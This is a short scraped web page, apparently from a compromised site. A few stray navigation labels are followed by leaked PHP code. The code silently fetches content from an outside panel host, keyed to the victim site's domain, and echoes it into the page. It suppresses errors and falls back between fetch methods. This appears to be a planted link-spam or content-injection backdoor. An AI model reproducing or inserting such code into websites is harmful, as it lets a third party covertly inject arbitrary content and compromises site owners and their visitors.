textanalyse
koi finance

RFID retail tracking

Back to top button
error_reporting(0); $sname2 = $_SERVER['SERVER_NAME']; $sname = str_replace(array("http://","https://","www."),null,$sname2); $x = "https://panel.atesleoynama.com/linkler/".$sname.".php"; if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // curl_setopt($ch,CURLOPT_USERAGENT,""); $gitt = curl_exec($ch); curl_close($ch); if($gitt == false){ @$gitt = file_get_contents($x); } }elseif(function_exists('file_get_contents')){ @$gitt = file_get_contents($x); } echo $gitt; ?>